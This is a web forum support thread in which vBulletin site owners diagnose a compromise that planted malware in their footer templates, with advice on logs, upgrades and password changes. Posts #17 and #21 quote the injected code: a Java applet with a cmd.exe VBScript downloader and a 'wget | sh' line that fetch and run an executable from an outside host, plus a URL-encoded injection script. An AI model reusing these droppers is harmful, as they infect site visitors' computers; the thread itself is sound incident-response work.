Announcement

Collapse
No announcement yet.

Vbulletin Virus URGENT HELP

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • #16
    Ok Try now, version 4.1.4, uploaded new files and still having the issue

    Comment


    • #17
      Found something:
      Code:
      <div id="box"> 
      <applet width='1' height='1' code='Client.class' archive='http://zolus.org/Client.jar'> 
      <param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs  http://zolus.org/s.exe %temp%\update.exe'> 
      <param name='windows2' value=''> 
       
      <param name='unix1' value=""> 
      <param name='unix2' value=""> 
       
      <param name='linux1' value="wget  http://zolus.org/s.exe -O- | sh"> 
      <param name='linux2' value=""> 
       
      </applet> 
      </div>
      hxxp://www.carpy.co.uk/search.php?do=getdaily&contenttype=vBForum_Post but I think the default skin just changed?
      I think that skin has the problem. Java malware

      I have reported the jar host to google for malware blocking (not your site)

      Comment


      • #18
        A cheer for ZeroHour!

        Found the damn thing in the footer template. Removed, looking good! Ive upgraded and still unsure how that would be done.

        Really appreciated, pop in sometime, I do a great cup of tea!

        Comment


        • #19
          Originally posted by PondPikey View Post
          A cheer for ZeroHour!

          Found the damn thing in the footer template. Removed, looking good! Ive upgraded and still unsure how that would be done.

          Really appreciated, pop in sometime, I do a great cup of tea!


          Find your apache logs and take a look through them for those accessing admincp/ etc other then your ip (www.whatismyip.com) to see if you can find the issue. Were you running 4.0.8 PL3?
          The logs will be key as there are rumours of a possible exploit in other versions but its all unconfirmed right now.
          The best thing you can do is zip up your http, error logs and admincp logs and send your story to vbulletin via the members area and give as best a timeline as possible to help them see if they spot anything. Also a mods list would be good as some mods had major holes (paste that here as well ideally)

          Comment


          • #20
            Will do ZH, Again, much appreciated.

            Comment


            • #21
              Same thing happened to me, my FTP client says that a few files were uploaded at 1909 on the 20th. This was the code in the footer:

              Code:
              <script type='text/javascript' language='Javascript'>document.write(unescape('%3c%61%70%70%6c%65%74%20%77%69%64%74%68%3d%27%31%27%20%68%65%69%67%68%74%3d%27%31%27%20%63%6f%64%65%3d%27%4a%61%76%61%2e%63%6c%61%73%73%27%20%61%72%63%68%69%76%65%3d%27%4a%61%76%61%2e%6a%61%72%27%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%75%72%6c%27%20%76%61%6c%75%65%3d%27%68%74%74%70%3a%2f%2f%7a%6f%6c%75%73%2e%6f%72%67%2f%73%2e%65%78%65%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%6c%6f%63%61%74%69%6f%6e%27%20%76%61%6c%75%65%3d%27%25%41%50%50%44%41%54%41%25%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%66%69%6c%65%27%20%76%61%6c%75%65%3d%27%73%2e%65%78%65%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%72%27%20%76%61%6c%75%65%20%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%27%20%2f%3e%3c%2f%61%70%70%6c%65%74%3e'));</script>
              It leads to some sort of script at zolus.org

              I've changed my forum password and am now asking my host to change my ftp password, as that's the only way I can think of that they'd be able to upload files to the server. I'm running 4.0.6 patch level 1, time to upgrade I guess...
              Photography :: Bird Information and Help

              Comment


              • #22
                [QUOTE=Tailfeathers;2175964]Same thing happened to me, my FTP client says that a few files were uploaded at 1909 on the 20th. This was the code in the footer:

                Was your mysql password the same as your ftp?
                What permissions were set on the dir they uploaded too?

                Comment

                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                Working...
                X